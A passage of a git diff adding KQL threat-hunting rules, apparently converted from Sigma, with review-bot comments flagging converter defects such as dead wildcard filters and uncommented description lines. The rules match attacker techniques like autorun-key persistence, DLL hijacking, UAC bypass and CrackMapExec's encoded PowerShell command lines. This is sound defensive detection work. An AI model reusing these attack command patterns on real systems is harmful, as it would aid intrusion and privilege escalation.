Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}*")) or isnull(RegistryValueData) or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")))) and (not(((RegistryValueData =~ "Binary Data" and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\avgToolsSvc.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\avgToolsSvc.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run*") or ((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}", "{472083B1-C522-11CF-8763-00608CC02F24}")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or ((RegistryValueData in~ ("\"C:\\Program Files\\Avast Software\\Avast\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\Avast Software\\Avast\\AvLaunch.exe\" /gui")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData endswith "\\Discord\\Update.exe --processStart Discord.exe" and RegistryKey endswith 
"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith "C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData in~ ("C:\\Program 
Files\\Opera\\launcher.exe", "C:\\Program Files (x86)\\Opera\\launcher.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable") or ((RegistryValueData contains "\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart" and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql new file mode 100644 index 00000000..0d736142 --- /dev/null +++ b/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@
+// Title: CurrentVersion NT Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey endswith "\\Image File Execution Options*" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" and RegistryKey contains "\\runtimebroker.exe\\Microsoft.Windows.ShellExperienceHost") or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000009)", "DWORD 
(0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval"))))) and (not((((RegistryValueData in~ ("explorer.exe", "C:\\Windows\\system32\\userinit.exe,")) and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avira\\Antivirus\\avguard.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avira\\Antivirus\\avguard.exe") and RegistryKey endswith "SOFTWARE\\WOW6432Node\\Avira\\Antivirus\\Overwrite_Keys\\HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" and (RegistryKey endswith "\\userinit\\UseAsDefault" or RegistryKey endswith "\\shell\\UseAsDefault")) or (InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or ((RegistryKey endswith "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion*" or RegistryKey endswith "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion*") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData 
startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
new file mode 100644
index 00000000..0cfdabf9
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
@@ -0,0 +1,13 @@
+// Title: Default RDP Port Changed to Non Standard Port
+// Author: frack113
+// Date: 2022-01-01
+// Level: high
+// Description: Detects changes to the default RDP port.
+Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
+Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql
new file mode 100644
index 00000000..09dc828f
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql
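Review bot: Three exclusion terms in the `| where` line of the CurrentVersion NT Autorun Keys hunk keep a literal Sigma wildcard inside the string — `RegistryKey endswith "\\Image File Execution Options*"`, `RegistryKey endswith "...\\Winlogon*"` and `RegistryKey endswith "...\\CurrentVersion*"` — and a key never ends in `*`, so those false-positive filters are dead and the rule keeps firing on the IFEO MitigationOptions, Avira and ClickToRun cases they were meant to suppress. A trailing `*` after `endswith` should be translated to `contains` without the star, e.g. `RegistryKey contains "\\Image File Execution Options"`. Since the same pattern presumably comes out of the converter for every rule whose filter ends in a wildcard, the fix belongs in the backend rather than in this one file. The `| where` line of this hunk is wrapped across several physical lines here.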
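Review bot: In the Default RDP Port hunk the description continuation lines `+Remote desktop is a common feature in operating systems. …` and `+Microsoft refers to its implementation …` are emitted without the `//` prefix, so the .kql file holds two lines of bare prose above the query and will not parse as a single statement when pasted into Advanced Hunting. Every line of a multi-line Sigma description needs the comment marker, e.g. `// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.` The same defect appears in the HollowReaper, SharpDPAPI, SharpSuccessor and Linux Sudo Chroot hunks further down, which points at the converter's header writer rather than at individual rules.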
@@ -0,0 +1,10 @@
+// Title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
+// Author: Jonhnathan Ribeiro, oscd.community
+// Date: 2020-10-16
+// Level: high
+// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql b/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql
new file mode 100644
index 00000000..946328a1
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql
@@ -0,0 +1,10 @@
+// Title: DHCP Callout DLL Installation
+// Author: Dimitrios Slamaris
+// Date: 2017-05-15
+// Level: high
+// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql
new file mode 100644
index 00000000..88473e7c
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql
@@ -0,0 +1,14 @@
+// Title: Direct Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
+// - Legitimate administrator sets up autorun keys for legitimate reasons.
+// - Discord
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "add" and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql b/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql
new file mode 100644
index 00000000..0e1002a7
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql
@@ -0,0 +1,10 @@
+// Title: DLL Execution Via Register-cimprovider.exe
+// Author: Ivan Dyachkov, Yulia Fomina, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql b/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql
new file mode 100644
index 00000000..d26ddbe1
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql
@@ -0,0 +1,10 @@
+// Title: DLL Load via LSASS
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-16
+// Level: high
+// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.008
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe")))
\ No newline at end of file
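Review bot: The lsass exclusion in the DLL Load via LSASS hunk compares RegistryValueData against `"%%systemroot%%\\system32\\ntdsa.dll"` with doubled percent signs, which is how Sysmon renders REG_EXPAND_SZ data; if DeviceRegistryEvents records the value as `%systemroot%\system32\ntdsa.dll` with single percent signs, the filter never matches and every legitimate lsass write to DirectoryServiceExtPt or LsaDbExtPt raises this high-severity alert. This is worth checking against a real event before the rule ships; if the single-percent form is what the table logs, the two list entries should read `"%systemroot%\\system32\\ntdsa.dll"` and `"%systemroot%\\system32\\lsadb.dll"`.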
diff --git a/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql b/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql
new file mode 100644
index 00000000..a5b34511
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql
@@ -0,0 +1,12 @@
+// Title: DLL Sideloading by VMware Xfer Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql b/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql
new file mode 100644
index 00000000..4b644c9b
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql
@@ -0,0 +1,12 @@
+// Title: Dllhost.EXE Execution Anomaly
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-27
+// Level: high
+// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine)))
\ No newline at end of file
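Review bot: In the Dllhost.EXE Execution Anomaly hunk, `not(isnull(ProcessCommandLine))` adds nothing, because `ProcessCommandLine in~ ("dllhost.exe", "dllhost")` already fails on a null value; the trailing term can be dropped so the predicate reads `(ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe"`. Separately, the exact-match list assumes the command line is the bare image name, whereas Advanced Hunting command lines commonly carry the quoted full path, so the rule may rarely fire — confirm against live data before relying on it.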
diff --git a/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql b/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql
new file mode 100644
index 00000000..9e503e72
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql
@@ -0,0 +1,13 @@
+// Title: Explorer NOUACCHECK Flag
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: high
+// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+// False Positives:
+// - Domain Controller User Logon
+// - Unknown how many legitimate software products use that method
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql b/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql
new file mode 100644
index 00000000..2740394f
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql
@@ -0,0 +1,12 @@
+// Title: Fax Service DLL Search Order Hijack
+// Author: NVISO
+// Date: 2020-05-04
+// Level: high
+// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql b/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql
new file mode 100644
index 00000000..1f45d537
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Creation In Suspicious Directory By Msdt.EXE
+// Author: Vadim Varganov, Florian Roth (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, cve.2022-30190
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql b/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql
new file mode 100644
index 00000000..e5cb3b0a
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql
@@ -0,0 +1,10 @@
+// Title: Guest Account Enabled Via Sysadminctl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: low
+// Description: Detects attempts to enable the guest account using the sysadminctl utility
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078, attack.t1078.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -guestAccount" and ProcessCommandLine contains " on") and FolderPath endswith "/sysadminctl"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql b/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql
new file mode 100644
index 00000000..deb09d0a
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec Execution Patterns
+// Author: Thomas Patzke
+// Date: 2020-05-22
+// Level: high
+// Description: Detects various execution patterns of the CrackMapExec pentesting framework
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc "
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql b/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql
new file mode 100644
index 00000000..ebb9ab75
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql
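Review bot: In the first two branches of the CrackMapExec predicate, `ProcessCommandLine contains "\\"` is repeated twice and is already implied by the `" 1> \\"` / `" > \\"` term of the same branch, so it constrains nothing; the branches should be trimmed to the meaningful terms, e.g. `(ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains " 2>&1")`. The repetition looks like the backend splitting a multi-segment wildcard pattern into independent `contains` clauses and losing the ordering between the segments; if that ordering is what the original rule relies on, a single `matches regex` term would express it faithfully.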
@@ -0,0 +1,12 @@
+// Title: HackTool - DInjector PowerShell Cradle Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-07
+// Level: critical
+// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
new file mode 100644
index 00000000..df8f7ea4
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - HollowReaper Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-01
+// Level: high
+// Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.
+It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012
+
+DeviceProcessEvents
+| where FolderPath endswith "\\HollowReaper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql b/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql
new file mode 100644
index 00000000..492ddb5b
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Impersonate Execution
+// Author: Sai Prashanth Pulisetti @pulisettis
+// Date: 2022-12-21
+// Level: medium
+// Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "impersonate.exe" and (ProcessCommandLine contains " list " or ProcessCommandLine contains " exec " or ProcessCommandLine contains " adduser ")) or (MD5 startswith "9520714AB576B0ED01D1513691377D01" or SHA256 startswith "E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
new file mode 100644
index 00000000..d267a9ad
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
